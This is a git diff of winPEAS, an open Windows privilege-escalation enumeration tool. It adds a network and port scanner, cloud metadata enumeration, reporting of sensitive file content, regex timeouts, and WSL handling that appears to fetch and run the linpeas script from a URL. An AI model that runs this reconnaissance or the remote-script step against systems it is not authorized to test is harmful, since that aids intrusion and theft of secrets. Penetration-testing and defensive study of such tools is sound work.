<Error Condition="!Exists('..\packages\Costura.Fody.5.7.0\build\Costura.Fody.targets')" Text="$([System.String]::Format('$(ErrorText)', '..\packages\Costura.Fody.5.7.0\build\Costura.Fody.targets'))" />
</Target>
<Import Project="..\packages\Microsoft.CodeCoverage.16.10.0\build\netstandard1.0\Microsoft.CodeCoverage.targets" Condition="Exists('..\packages\Microsoft.CodeCoverage.16.10.0\build\netstandard1.0\Microsoft.CodeCoverage.targets')" />
<Import Project="..\packages\Microsoft.NET.Test.Sdk.16.10.0\build\net45\Microsoft.NET.Test.Sdk.targets" Condition="Exists('..\packages\Microsoft.NET.Test.Sdk.16.10.0\build\net45\Microsoft.NET.Test.Sdk.targets')" />
<Import Project="..\packages\MSTest.TestAdapter.2.2.5\build\net45\MSTest.TestAdapter.targets" Condition="Exists('..\packages\MSTest.TestAdapter.2.2.5\build\net45\MSTest.TestAdapter.targets')" />
<Import Project="..\packages\EntityFramework.6.4.4\build\EntityFramework.targets" Condition="Exists('..\packages\EntityFramework.6.4.4\build\EntityFramework.targets')" />
<Import Project="..\packages\Stub.System.Data.SQLite.Core.NetFramework.1.0.119.0\build\net451\Stub.System.Data.SQLite.Core.NetFramework.targets" Condition="Exists('..\packages\Stub.System.Data.SQLite.Core.NetFramework.1.0.119.0\build\net451\Stub.System.Data.SQLite.Core.NetFramework.targets')" />
<Import Project="..\packages\Fody.6.5.5\build\Fody.targets" Condition="Exists('..\packages\Fody.6.5.5\build\Fody.targets')" />
<Import Project="..\packages\Costura.Fody.5.7.0\build\Costura.Fody.targets" Condition="Exists('..\packages\Costura.Fody.5.7.0\build\Costura.Fody.targets')" />
</Project>

268
winPEAS/winPEASexe/UpgradeLog.htm Normal file
View File

@@ -0,0 +1,268 @@
<!DOCTYPE html>
<!-- saved from url=(0014)about:internet -->
<html xmlns:msxsl="urn:schemas-microsoft-com:xslt"><head><meta content="en-us" http-equiv="Content-Language" /><meta content="text/html; charset=utf-16" http-equiv="Content-Type" /><title _locID="ConversionReport0">
Migration Report
</title><style>
/* Body style, for the entire document */
body
{
background: #F3F3F4;
color: #1E1E1F;
font-family: "Segoe UI", Tahoma, Geneva, Verdana, sans-serif;
padding: 0;
margin: 0;
}
/* Header1 style, used for the main title */
h1
{
padding: 10px 0px 10px 10px;
font-size: 21pt;
background-color: #E2E2E2;
border-bottom: 1px #C1C1C2 solid;
color: #201F20;
margin: 0;
font-weight: normal;
}
/* Header2 style, used for "Overview" and other sections */
h2
{
font-size: 18pt;
font-weight: normal;
padding: 15px 0 5px 0;
margin: 0;
}
/* Header3 style, used for sub-sections, such as project name */
h3
{
font-weight: normal;
font-size: 15pt;
margin: 0;
padding: 15px 0 5px 0;
background-color: transparent;
}
/* Color all hyperlinks one color */
a
{
color: #1382CE;
}
/* Table styles */
table
{
border-spacing: 0 0;
border-collapse: collapse;
font-size: 10pt;
}
table th
{
background: #E7E7E8;
text-align: left;
text-decoration: none;
font-weight: normal;
padding: 3px 6px 3px 6px;
}
table td
{
vertical-align: top;
padding: 3px 6px 5px 5px;
margin: 0px;
border: 1px solid #E7E7E8;
background: #F7F7F8;
}
/* Local link is a style for hyperlinks that link to file:/// content, there are lots so color them as 'normal' text until the user mouse overs */
.localLink
{
color: #1E1E1F;
background: #EEEEED;
text-decoration: none;
}
.localLink:hover
{
color: #1382CE;
background: #FFFF99;
text-decoration: none;
}
/* Center text, used in the over views cells that contain message level counts */
.textCentered
{
text-align: center;
}
/* The message cells in message tables should take up all avaliable space */
.messageCell
{
width: 100%;
}
/* Padding around the content after the h1 */
#content
{
padding: 0px 12px 12px 12px;
}
/* The overview table expands to width, with a max width of 97% */
#overview table
{
width: auto;
max-width: 75%;
}
/* The messages tables are always 97% width */
#messages table
{
width: 97%;
}
/* All Icons */
.IconSuccessEncoded, .IconInfoEncoded, .IconWarningEncoded, .IconErrorEncoded
{
min-width:18px;
min-height:18px;
background-repeat:no-repeat;
background-position:center;
}
/* Success icon encoded */
.IconSuccessEncoded
{
/* Note: Do not delete the comment below. It is used to verify the correctness of the encoded image resource below before the product is released */
/* [---XsltValidateInternal-Base64EncodedImage:IconSuccess#Begin#background-image: url(data:image/png;base64,#Separator#);#End#] */
background-image: url(data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAACXBIWXMAAA7EAAAOxAGVKw4bAAABcElEQVR4Xq2TsUsCURzHv15g8ZJcBWlyiYYgCIWcb9DFRRwMW5TA2c0/QEFwFkxxUQdxVlBwCYWOi6IhWgQhBLHJUCkhLr/BW8S7gvrAg+N+v8/v+x68Z8MGy+XSCyABQAXgBgHGALoASkIIDWSLeLBetdHryMjd5IxQPWT4rn1c/P7+xxp72Cs9m5SZ0Bq2vPnbPFafK2zDvmNHypdC0BPkLlQhxJsCAhQoZwdZU5mwxh720qGo8MzTxTTKZDPCx2HoVzp6lz0Q9tKhyx0kGs8Ny+TkWRKk8lCROwEduhyg9l/6lunOPSfmH3NUH6uQ0KHLAe7JYvJjevm+DAMGJHToKtigE+vwvIidxLamb8IBY9e+C5LiXREkfho3TSd06HJA13/oh6T51MTsfQbHrsMynQ5dDihFjiK8JJAU9AKIWTp76dCVN7HWHrajmUEGvyF9nkbAE6gLIS7kTUyuf2gscLoJrElZo/Mvj+nPz/kLTmfnEwP3tB0AAAAASUVORK5CYII=);
}
/* Information icon encoded */
.IconInfoEncoded
{
/* Note: Do not delete the comment below. It is used to verify the correctness of the encoded image resource below before the product is released */
/* [---XsltValidateInternal-Base64EncodedImage:IconInformation#Begin#background-image: url(data:image/png;base64,#Separator#);#End#] */
background-image: url(data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAABHElEQVR4Xs2TsUoDQRRF7wwoziokjZUKadInhdhukR9YP8DMX1hYW+QvdsXa/QHBbcXC7W0CamWTQnclFutceIQJwwaWNLlwm5k5d94M76mmaeCrrmsLYOocY12FcxZFUeozCqKqqgYA8uevv1H6VuPxcwlfk5N92KHBxfFeCSAxxswlYAW/Xr989x/mv9gkhtyMDhcAxgzRsp7flj8B/HF1RsMXq+NZMkopaHe7lbKxQUEIGbKsYNoGn969060hZBkQex/W8oRQwsQaW2o3Ago2SVcJUzAgY3N0lTCZZm+zPS8HB51gMmS1DEYyOz9acKO1D8JWTlafKIMxdhvlfdyT94Vv5h7P8Ky7nQzACmhvKq3zk3PjW9asz9D/1oigecsioooAAAAASUVORK5CYII=);
}
/* Warning icon encoded */
.IconWarningEncoded
{
/* Note: Do not delete the comment below. It is used to verify the correctness of the encoded image resource below before the product is released */
/* [---XsltValidateInternal-Base64EncodedImage:IconWarning#Begin#background-image: url(data:image/png;base64,#Separator#);#End#] */
background-image: url(data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAACXBIWXMAAA7EAAAOxAGVKw4bAAAAx0lEQVR4XpWSMQ7CMAxFf4xAyBMLCxMrO8dhaBcuwdCJS3RJBw7SA/QGTCxdWJgiQYWKXJWKIXHIlyw5lqr34tQgEOdcBsCOx5yZK3hCCKdYXneQkh4pEfqzLfu+wVDSyyzFoJjfz9NB+pAF+eizx2Vruts0k15mPgvS6GYvpVtQhB61IB/dk6AF6fS4Ben0uIX5odtFe8Q/eW1KvFeH4e8khT6+gm5B+t3juyDt7n0jpe+CANTd+oTUjN/U3yVaABnSUjFz/gFq44JaVSCXeQAAAABJRU5ErkJggg==);
}
/* Error icon encoded */
.IconErrorEncoded
{
/* Note: Do not delete the comment below. It is used to verify the correctness of the encoded image resource below before the product is released */
/* [---XsltValidateInternal-Base64EncodedImage:IconError#Begin#background-image: url(data:image/png;base64,#Separator#);#End#] */
background-image: url(data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAABQElEQVR4XqWTvUoEQRCE6wYPZUA80AfwAQz23uCMjA7MDRQEIzPBVEyNTQUFIw00vcQTTMzuAh/AxEQQT8HF/3G/oGGnEUGuoNnd6qoZuqltyKEsyzVJq5I6rnUp6SjGeGhESikzzlc1eL7opfuVbrqbU1Zw9NCgtQMaZpY0eNnaaL2fHusvTK5vKu7sjSS1Y4y3QUA6K3e3Mau5UFDyMP7tYF9o8cAHZv68vipoIJg971PZIZ5HiwdvYGGvFVFHmGmZ2MxwmQYPXubPl9Up0tfoMQGetXd6mRbvhBw+boZ6WF7Mbv1+GsHRk0fQmPAH1GfmZirbCfDJ61tw3Px8/8pZsPAG4jlVhcPgZ7adwNWBB68lkRQWFiTgFlbnLY3DGGM7izIJIyT/jjIvEJw6fdJTc6krDzh6aMwMP9bvDH4ADSsa9uSWVJkAAAAASUVORK5CYII=);
}
</style><script type="text/javascript" language="javascript">
// Startup
// Hook up the the loaded event for the document/window, to linkify the document content
var startupFunction = function() { linkifyElement("messages"); };
if(window.attachEvent)
{
window.attachEvent('onload', startupFunction);
}
else if (window.addEventListener)
{
window.addEventListener('load', startupFunction, false);
}
else
{
document.addEventListener('load', startupFunction, false);
}
// Toggles the visibility of table rows with the specified name
function toggleTableRowsByName(name)
{
var allRows = document.getElementsByTagName('tr');
for (i=0; i < allRows.length; i++)
{
var currentName = allRows[i].getAttribute('name');
if(!!currentName && currentName.indexOf(name) == 0)
{
var isVisible = allRows[i].style.display == '';
isVisible ? allRows[i].style.display = 'none' : allRows[i].style.display = '';
}
}
}
function scrollToFirstVisibleRow(name)
{
var allRows = document.getElementsByTagName('tr');
for (i=0; i < allRows.length; i++)
{
var currentName = allRows[i].getAttribute('name');
var isVisible = allRows[i].style.display == '';
if(!!currentName && currentName.indexOf(name) == 0 && isVisible)
{
allRows[i].scrollIntoView(true);
return true;
}
}
return false;
}
// Linkifies the specified text content, replaces candidate links with html links
function linkify(text)
{
if(!text || 0 === text.length)
{
return text;
}
// Find http, https and ftp links and replace them with hyper links
var urlLink = /(http|https|ftp)\:\/\/[a-zA-Z0-9\-\.]+(:[a-zA-Z0-9]*)?\/?([a-zA-Z0-9\-\._\?\,\/\\\+&%\$#\=~;\{\}])*/gi;
return text.replace(urlLink, '<a href="$&">$&</a>') ;
}
// Linkifies the specified element by ID
function linkifyElement(id)
{
var element = document.getElementById(id);
if(!!element)
{
element.innerHTML = linkify(element.innerHTML);
}
}
function ToggleMessageVisibility(projectName)
{
if(!projectName || 0 === projectName.length)
{
return;
}
toggleTableRowsByName("MessageRowClass" + projectName);
toggleTableRowsByName('MessageRowHeaderShow' + projectName);
toggleTableRowsByName('MessageRowHeaderHide' + projectName);
}
function ScrollToFirstVisibleMessage(projectName)
{
if(!projectName || 0 === projectName.length)
{
return;
}
// First try the 'Show messages' row
if(!scrollToFirstVisibleRow('MessageRowHeaderShow' + projectName))
{
// Failed to find a visible row for 'Show messages', try an actual message row
scrollToFirstVisibleRow('MessageRowClass' + projectName);
}
}
</script></head><body><h1 _locID="ConversionReport">
Migration Report - </h1><div id="content"><h2 _locID="OverviewTitle">Overview</h2><div id="overview"><table><tr><th></th><th _locID="ProjectTableHeader">Project</th><th _locID="PathTableHeader">Path</th><th _locID="ErrorsTableHeader">Errors</th><th _locID="WarningsTableHeader">Warnings</th><th _locID="MessagesTableHeader">Messages</th></tr><tr><td class="IconErrorEncoded" /><td><strong><a href="#winPEAS">winPEAS</a></strong></td><td>winPEAS\winPEAS.csproj</td><td class="textCentered"><a href="#winPEASError">1</a></td><td class="textCentered"><a>0</a></td><td class="textCentered"><a href="#">0</a></td></tr></table></div><h2 _locID="SolutionAndProjectsTitle">Solution and projects</h2><div id="messages"><a name="winPEAS" /><h3>winPEAS</h3><table><tr id="winPEASHeaderRow"><th></th><th class="messageCell" _locID="MessageTableHeader">Message</th></tr><tr name="ErrorRowClasswinPEAS"><td class="IconErrorEncoded"><a name="winPEASError" /></td><td class="messageCell"><strong>winPEAS\winPEAS.csproj:
</strong><span>Error on line 378651072. Expected 'ENCODING' but found 'utf-8'.</span></td></tr></table></div></div></body></html>

1
winPEAS/winPEASexe/winPEAS/.vs/winPEAS.csproj.dtbcache.json Normal file
View File

File diff suppressed because one or more lines are too long

4
winPEAS/winPEASexe/winPEAS/3rdParty/Watson/Watson.cs vendored
View File

@@ -20,7 +20,7 @@ namespace winPEAS._3rdParty.Watson
{
{ 10240, "1507" }, { 10586, "1511" }, { 14393, "1607" }, { 15063, "1703" }, { 16299, "1709" },
{ 17134, "1803" }, { 17763, "1809" }, { 18362, "1903" }, { 18363, "1909" }, { 19041, "2004" },
{ 19042, "20H2" }
{ 19042, "20H2" }, { 22000, "21H2" }, { 22621, "22H2" }
};
// Get OS Build number
@@ -30,7 +30,6 @@ namespace winPEAS._3rdParty.Watson
if (!supportedVersions.ContainsKey(buildNumber))
{
Console.Error.WriteLine($" [!] Windows version not supported, build number: '{buildNumber}'");
return;
}
var version = supportedVersions[buildNumber];
@@ -39,7 +38,6 @@ namespace winPEAS._3rdParty.Watson
else
{
Console.Error.WriteLine(" [!] Could not retrieve Windows BuildNumber");
return;
}
// List of KBs installed

38
winPEAS/winPEASexe/winPEAS/App.config
View File

@@ -1,9 +1,31 @@
<?xml version="1.0" encoding="utf-8"?>
<?xml version="1.0" encoding="utf-8"?>
<configuration>
<startup useLegacyV2RuntimeActivationPolicy="true">
<supportedRuntime version="v4.0" sku=".NETFramework,Version=v4.5.2"/></startup>
<runtime>
<AppContextSwitchOverrides value="Switch.System.IO.UseLegacyPathHandling=false" />
</runtime>
</configuration>
<configSections>
<!-- For more information on Entity Framework configuration, visit http://go.microsoft.com/fwlink/?LinkID=237468 -->
<section name="entityFramework" type="System.Data.Entity.Internal.ConfigFile.EntityFrameworkSection, EntityFramework, Version=6.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" requirePermission="false" />
</configSections>
<startup useLegacyV2RuntimeActivationPolicy="true">
<supportedRuntime version="v4.0" sku=".NETFramework,Version=v4.5.2" />
</startup>
<runtime>
<AppContextSwitchOverrides value="Switch.System.IO.UseLegacyPathHandling=false" />
<assemblyBinding xmlns="urn:schemas-microsoft-com:asm.v1">
<dependentAssembly>
<assemblyIdentity name="System.Runtime.CompilerServices.Unsafe" publicKeyToken="b03f5f7f11d50a3a" culture="neutral" />
<bindingRedirect oldVersion="0.0.0.0-6.0.0.0" newVersion="6.0.0.0" />
</dependentAssembly>
</assemblyBinding>
</runtime>
<entityFramework>
<providers>
<provider invariantName="System.Data.SqlClient" type="System.Data.Entity.SqlServer.SqlProviderServices, EntityFramework.SqlServer" />
<provider invariantName="System.Data.SQLite.EF6" type="System.Data.SQLite.EF6.SQLiteProviderServices, System.Data.SQLite.EF6" />
</providers>
</entityFramework>
<system.data>
<DbProviderFactories>
<remove invariant="System.Data.SQLite.EF6" />
<add name="SQLite Data Provider (Entity Framework 6)" invariant="System.Data.SQLite.EF6" description=".NET Framework Data Provider for SQLite (Entity Framework 6)" type="System.Data.SQLite.EF6.SQLiteProviderFactory, System.Data.SQLite.EF6" />
<remove invariant="System.Data.SQLite" /><add name="SQLite Data Provider" invariant="System.Data.SQLite" description=".NET Framework Data Provider for SQLite" type="System.Data.SQLite.SQLiteFactory, System.Data.SQLite" /></DbProviderFactories>
</system.data>
</configuration>

10
winPEAS/winPEASexe/winPEAS/Checks/ApplicationsInfo.cs
View File

@@ -117,6 +117,7 @@ namespace winPEAS.Checks
{ (app["Folder"].Length > 0) ? app["Folder"].Replace("\\", "\\\\").Replace("(", "\\(").Replace(")", "\\)").Replace("]", "\\]").Replace("[", "\\[").Replace("?", "\\?").Replace("+","\\+") : "ouigyevb2uivydi2u3id2ddf3", !string.IsNullOrEmpty(app["interestingFolderRights"]) ? Beaprint.ansi_color_bad : Beaprint.ansi_color_good },
{ (app["File"].Length > 0) ? app["File"].Replace("\\", "\\\\").Replace("(", "\\(").Replace(")", "\\)").Replace("]", "\\]").Replace("[", "\\[").Replace("?", "\\?").Replace("+","\\+") : "adu8v298hfubibuidiy2422r", !string.IsNullOrEmpty(app["interestingFileRights"]) ? Beaprint.ansi_color_bad : Beaprint.ansi_color_good },
{ (app["Reg"].Length > 0) ? app["Reg"].Replace("\\", "\\\\").Replace("(", "\\(").Replace(")", "\\)").Replace("]", "\\]").Replace("[", "\\[").Replace("?", "\\?").Replace("+","\\+") : "o8a7eduia37ibduaunbf7a4g7ukdhk4ua", (app["RegPermissions"].Length > 0) ? Beaprint.ansi_color_bad : Beaprint.ansi_color_good },
{ "Potentially sensitive file content:", Beaprint.ansi_color_bad },
};
string line = "";
@@ -158,9 +159,9 @@ namespace winPEAS.Checks
line += "\n File: " + filepath_mod;
}
if (app["isUnquotedSpaced"].ToLower() == "true")
if (app["isUnquotedSpaced"].ToLower() != "false")
{
line += " (Unquoted and Space detected)";
line += $" (Unquoted and Space detected) - {app["isUnquotedSpaced"]}";
}
if (!string.IsNullOrEmpty(app["interestingFileRights"]))
@@ -168,6 +169,11 @@ namespace winPEAS.Checks
line += "\n FilePerms: " + app["interestingFileRights"];
}
if (app.ContainsKey("sensitiveInfoList") && !string.IsNullOrEmpty(app["sensitiveInfoList"]))
{
line += "\n Potentially sensitive file content: " + app["sensitiveInfoList"];
}
Beaprint.AnsiPrint(line, colorsA);
Beaprint.PrintLineSeparator();
}

144
winPEAS/winPEASexe/winPEAS/Checks/Checks.cs
View File

@@ -3,12 +3,14 @@ using System.Collections.Generic;
using System.IO;
using System.Linq;
using System.Management;
using System.Net;
using System.Security.Principal;
using winPEAS.Helpers;
using winPEAS.Helpers.AppLocker;
using winPEAS.Helpers.Registry;
using winPEAS.Helpers.Search;
using winPEAS.Helpers.YamlConfig;
using winPEAS.Info.NetworkInfo.NetworkScanner;
using winPEAS.Info.UserInfo;
namespace winPEAS.Checks
@@ -21,8 +23,12 @@ namespace winPEAS.Checks
public static bool IsDebug = false;
public static bool IsLinpeas = false;
public static bool IsLolbas = false;
public static bool IsNetworkScan = false;
public static bool SearchProgramFiles = false;
private static IEnumerable<int> PortScannerPorts = null;
private static string NetworkScanOptions = string.Empty;
// Create Dynamic blacklists
public static readonly string CurrentUserName = Environment.UserName;
public static string CurrentUserDomainName = Environment.UserDomainName;
@@ -69,7 +75,6 @@ namespace winPEAS.Checks
//Check parameters
bool isAllChecks = true;
bool isFileSearchEnabled = false;
var searchEnabledChecks = new HashSet<string>() { "fileanalysis, filesinfo" };
bool wait = false;
FileStream fileStream = null;
StreamWriter fileWriter = null;
@@ -84,13 +89,15 @@ namespace winPEAS.Checks
new SystemCheck("servicesinfo", new ServicesInfo()),
new SystemCheck("applicationsinfo", new ApplicationsInfo()),
new SystemCheck("networkinfo", new NetworkInfo()),
new SystemCheck("cloudinfo", new CloudInfo()),
new SystemCheck("windowscreds", new WindowsCreds()),
new SystemCheck("browserinfo", new BrowserInfo()),
new SystemCheck("filesinfo", new FilesInfo()),
new SystemCheck("fileanalysis", new FileAnalysis())
new SystemCheck("fileanalysis", new FileAnalysis()),
};
var systemCheckAllKeys = new HashSet<string>(_systemChecks.Select(i => i.Key));
var print_fileanalysis_warn = true;
foreach (string arg in args)
{
@@ -103,6 +110,22 @@ namespace winPEAS.Checks
return;
}
if (string.Equals(arg, "fileanalysis", StringComparison.CurrentCultureIgnoreCase))
{
print_fileanalysis_warn = false;
isFileSearchEnabled = true;
}
if (string.Equals(arg, "filesinfo", StringComparison.CurrentCultureIgnoreCase))
{
isFileSearchEnabled = true;
}
if (string.Equals(arg, "all", StringComparison.CurrentCultureIgnoreCase))
{
print_fileanalysis_warn = false;
}
if (arg.StartsWith("log", StringComparison.CurrentCultureIgnoreCase))
{
// get logfile argument if present
@@ -199,19 +222,65 @@ namespace winPEAS.Checks
}
}
if (arg.StartsWith("-network", StringComparison.CurrentCultureIgnoreCase))
{
/*
-network="auto" - find interfaces/hosts automatically
-network="10.10.10.10,10.10.10.20" - scan only selected ip address(es)
-network="10.10.10.10/24" - scan host based on ip address/netmask
*/
if (!IsNetworkTypeValid(arg))
{
Beaprint.ColorPrint($" [!] the \"-network\" argument is invalid. For help, run winpeass.exe --help", Beaprint.YELLOW);
return;
}
var parts = arg.Split('=');
string networkType = parts[1];
IsNetworkScan = true;
NetworkScanOptions = networkType;
}
if (arg.StartsWith("-ports", StringComparison.CurrentCultureIgnoreCase))
{
// e.g. -ports="80,443,8080"
var parts = arg.Split('=');
if (!IsNetworkScan || parts.Length != 2 || string.IsNullOrEmpty(parts[1]))
{
Beaprint.ColorPrint($" [!] the \"-network\" argument is not present or valid, add it if you want to define network scan ports. For help, run winpeass.exe --help", Beaprint.YELLOW);
return;
}
var portString = parts[1];
IEnumerable<int> ports = new List<int>();
try
{
PortScannerPorts = portString.Trim('"').Trim('\'').Split(',').ToList().ConvertAll<int>(int.Parse);
}
catch (Exception)
{
Beaprint.ColorPrint($" [!] the \"-ports\" argument is not present or valid, add it if you want to define network scan ports. For help, run winpeass.exe --help", Beaprint.YELLOW);
return;
}
}
string argToLower = arg.ToLower();
if (systemCheckAllKeys.Contains(argToLower))
{
_systemCheckSelectedKeysHashSet.Add(argToLower);
isAllChecks = false;
if (searchEnabledChecks.Contains(argToLower))
{
isFileSearchEnabled = true;
}
}
}
if (print_fileanalysis_warn){
_systemChecks.RemoveAt(_systemChecks.Count - 1);
Beaprint.ColorPrint(" [!] If you want to run the file analysis checks (search sensitive information in files), you need to specify the 'fileanalysis' or 'all' argument. Note that this search might take several minutes. For help, run winpeass.exe --help", Beaprint.YELLOW);
}
if (isAllChecks)
{
isFileSearchEnabled = true;
@@ -237,7 +306,7 @@ namespace winPEAS.Checks
CheckRunner.Run(() => CreateDynamicLists(isFileSearchEnabled), IsDebug);
RunChecks(isAllChecks, wait);
RunChecks(isAllChecks, wait, IsNetworkScan);
SearchHelper.CleanLists();
@@ -258,7 +327,58 @@ namespace winPEAS.Checks
}
}
private static void RunChecks(bool isAllChecks, bool wait)
private static bool IsNetworkTypeValid(string arg)
{
var parts = arg.Split('=');
string networkType = string.Empty;
if (parts.Length == 2 && !string.IsNullOrEmpty(parts[1]))
{
networkType = parts[1];
// auto
if (string.Equals(networkType, "auto", StringComparison.InvariantCultureIgnoreCase))
{
return true;
}
// netmask e.g. 10.10.10.10/24
else if (networkType.Contains("/"))
{
var rangeParts = networkType.Split('/');
if (rangeParts.Length == 2 && int.TryParse(rangeParts[1], out int res) && res <= 32 && res >= 0)
{
return true;
}
}
// list of ip addresses
else if (networkType.Contains(","))
{
var ips = networkType.Split(',');
try
{
var validIpsCount = ips.ToList().ConvertAll<IPAddress>(IPAddress.Parse).Count();
}
catch (Exception)
{
return false;
}
return true;
}
// single ip
else if (IPAddress.TryParse(networkType, out _))
{
return true;
}
}
return false;
}
private static void RunChecks(bool isAllChecks, bool wait, bool isNetworkScan)
{
for (int i = 0; i < _systemChecks.Count; i++)
{
@@ -274,6 +394,12 @@ namespace winPEAS.Checks
}
}
}
if (isNetworkScan)
{
NetworkScanner scanner = new NetworkScanner(NetworkScanOptions, PortScannerPorts);
scanner.Scan();
}
}
private static void CreateDynamicLists(bool isFileSearchEnabled)

94
winPEAS/winPEASexe/winPEAS/Checks/CloudInfo.cs Normal file
View File

@@ -0,0 +1,94 @@
using System.Collections.Generic;
using winPEAS.Helpers;
using winPEAS.Info.CloudInfo;
namespace winPEAS.Checks
{
internal class CloudInfo : ISystemCheck
{
public void PrintInfo(bool isDebug)
{
Beaprint.GreatPrint("Cloud Information");
var cloudInfoList = new List<CloudInfoBase>
{
new AWSInfo(),
new AzureInfo(),
new GCPInfo(),
new GCPJoinedInfo()
};
foreach (var cloudInfo in cloudInfoList)
{
string isCloud = cloudInfo.IsCloud ? "Yes" : "No";
string line = string.Format($"{cloudInfo.Name + "?",-40}{isCloud,-5}");
Dictionary<string, string> colorsMS = new Dictionary<string, string>()
{
{ "Yes", Beaprint.ansi_color_bad },
};
Beaprint.AnsiPrint(line, colorsMS);
}
foreach (var cloudInfo in cloudInfoList)
{
if (cloudInfo.IsCloud)
{
Beaprint.MainPrint(cloudInfo.Name + " Enumeration");
if (cloudInfo.IsAvailable)
{
foreach (var kvp in cloudInfo.EndpointDataList())
{
// key = "section", e.g. User, Network, ...
string section = kvp.Key;
var endpointDataList = kvp.Value;
Beaprint.ColorPrint(section, Beaprint.ansi_color_good);
foreach (var endpointData in endpointDataList)
{
var colors = new Dictionary<string, string>
{
{ endpointData.EndpointName, Beaprint.GRAY }
};
string message;
if (!string.IsNullOrEmpty(endpointData.Data))
{
message = endpointData.Data;
// if it is a JSON data, add additional newline so it's displayed on a separate line
if (message.StartsWith("{"))
{
message = $"\n{message}\n";
}
if (endpointData.IsAttackVector)
{
colors.Add(message, Beaprint.ansi_color_bad);
}
else
{
colors.Add(message, Beaprint.ansi_color_gray);
}
}
else
{
message = "No data received from the metadata endpoint";
}
Beaprint.ColorPrint($"{endpointData.EndpointName,-30}{message}", Beaprint.ansi_color_gray);
}
Beaprint.GrayPrint("");
}
}
else
{
Beaprint.NoColorPrint("Could not connect to the metadata endpoint");
}
}
}
}
}
}

50
winPEAS/winPEASexe/winPEAS/Checks/FileAnalysis.cs
View File

@@ -1,4 +1,4 @@
using System;
using System;
using System.Collections.Generic;
using System.Diagnostics;
using System.IO;
@@ -97,9 +97,19 @@ namespace winPEAS.Checks
else
{
foreach (var fold in file.FullPath.Split('\\').Skip(1))
{
isFileFound = Regex.IsMatch(fold, pattern, RegexOptions.IgnoreCase);
if (isFileFound) break;
{
try
{
isFileFound = Regex.IsMatch(fold, pattern, RegexOptions.IgnoreCase, TimeSpan.FromSeconds(20));
if (isFileFound) break;
}
catch (RegexMatchTimeoutException e)
{
if (Checks.IsDebug)
{
Beaprint.GrayPrint($"The file in folder regex {pattern} had a timeout in {fold} (ReDoS avoided but regex unchecked in a file)");
}
}
}
}
}
@@ -111,7 +121,17 @@ namespace winPEAS.Checks
}
else
{
isFileFound = Regex.IsMatch(file.Filename, pattern, RegexOptions.IgnoreCase);
try
{
isFileFound = Regex.IsMatch(file.Filename, pattern, RegexOptions.IgnoreCase, TimeSpan.FromSeconds(20));
}
catch (RegexMatchTimeoutException e)
{
if (Checks.IsDebug)
{
Beaprint.GrayPrint($"The file regex {pattern} had a timeout in {file.Filename} (ReDoS avoided but regex unchecked in a file)");
}
}
}
}
@@ -148,7 +168,7 @@ namespace winPEAS.Checks
return new bool[] { false, somethingFound };
}
private static List<string> SearchContent(string text, string regex_str, bool caseinsensitive)
public static List<string> SearchContent(string text, string regex_str, bool caseinsensitive)
{
List<string> foundMatches = new List<string>();
@@ -158,16 +178,20 @@ namespace winPEAS.Checks
bool is_re_match = false;
try
{
// Escape backslashes in the regex string - I don't think this is needed anymore
//string escapedRegex = regex_str.Trim().Replace(@"\", @"\\");
string escapedRegex = regex_str.Trim();
// Use "IsMatch" because it supports timeout, if exception is thrown exit the func to avoid ReDoS in "rgx.Matches"
if (caseinsensitive)
{
is_re_match = Regex.IsMatch(text, regex_str.Trim(), RegexOptions.IgnoreCase, TimeSpan.FromSeconds(120));
rgx = new Regex(regex_str.Trim(), RegexOptions.IgnoreCase);
is_re_match = Regex.IsMatch(text, escapedRegex, RegexOptions.IgnoreCase, TimeSpan.FromSeconds(120));
rgx = new Regex(escapedRegex, RegexOptions.IgnoreCase);
}
else
{
is_re_match = Regex.IsMatch(text, regex_str.Trim(), RegexOptions.None, TimeSpan.FromSeconds(120));
rgx = new Regex(regex_str.Trim());
is_re_match = Regex.IsMatch(text, escapedRegex, RegexOptions.None, TimeSpan.FromSeconds(120));
rgx = new Regex(escapedRegex);
}
}
catch (RegexMatchTimeoutException e)
@@ -200,8 +224,6 @@ namespace winPEAS.Checks
Beaprint.GrayPrint($"Error looking for regex {regex_str} inside files: {e}");
}
//}
return foundMatches;
}
@@ -454,8 +476,8 @@ namespace winPEAS.Checks
timer.Stop();
TimeSpan timeTaken = timer.Elapsed;
if (timeTaken.TotalMilliseconds > 20000)
Beaprint.PrintDebugLine($"\nThe regex {regex.regex} took {timeTaken.TotalMilliseconds}s in {f.FullPath}");
if (timeTaken.TotalMilliseconds > 10000)
Beaprint.PrintDebugLine($"\nThe regex {regex.regex} took {timeTaken.TotalMilliseconds}ms in {f.FullPath}");
}
}
}

18
winPEAS/winPEASexe/winPEAS/Checks/FilesInfo.cs
View File

@@ -290,15 +290,13 @@ namespace winPEAS.Checks
const string distribution = "Distribution";
const string rootDirectory = "Root directory";
const string runWith = "Run command";
const string wslUser = "WSL user";
const string root = "root";
var colors = new Dictionary<string, string>();
new List<string>
{
linpeas,
distribution,
rootDirectory,
runWith
}.ForEach(str => colors.Add(str, Beaprint.ansi_color_bad));
new List<string> { linpeas, distribution, rootDirectory, runWith, wslUser, root }
.ForEach(str => colors.Add(str, Beaprint.ansi_color_bad));
Beaprint.BadPrint(" Found installed WSL distribution(s) - listed below");
Beaprint.AnsiPrint($" Run {linpeas} in your WSL distribution(s) home folder(s).\n", colors);
@@ -310,14 +308,16 @@ namespace winPEAS.Checks
string distributionSubKey = $"{basePath}\\{wslKey}";
string distributionRootDirectory = $"{RegistryHelper.GetRegValue(hive, distributionSubKey, "BasePath")}\\rootfs";
string distributionName = RegistryHelper.GetRegValue(hive, distributionSubKey, "DistributionName");
string user = WSLHelper.TryGetRootUser(distributionName, wslKey);
Beaprint.AnsiPrint($" {distribution}: \"{distributionName}\"\n" +
$" {wslUser}: \"{user}\"\n" +
$" {rootDirectory}: \"{distributionRootDirectory}\"\n" +
$" {runWith}: wsl.exe --distribution \"{distributionName}\"",
colors);
Beaprint.PrintLineSeparator();
}
catch (Exception) { }
catch (Exception ex) { }
}
// try to run linpeas.sh in the default distribution
@@ -328,7 +328,7 @@ namespace winPEAS.Checks
{
try
{
WSL.RunLinpeas(Checks.LinpeasUrl);
WSLHelper.RunLinpeas(Checks.LinpeasUrl);
}
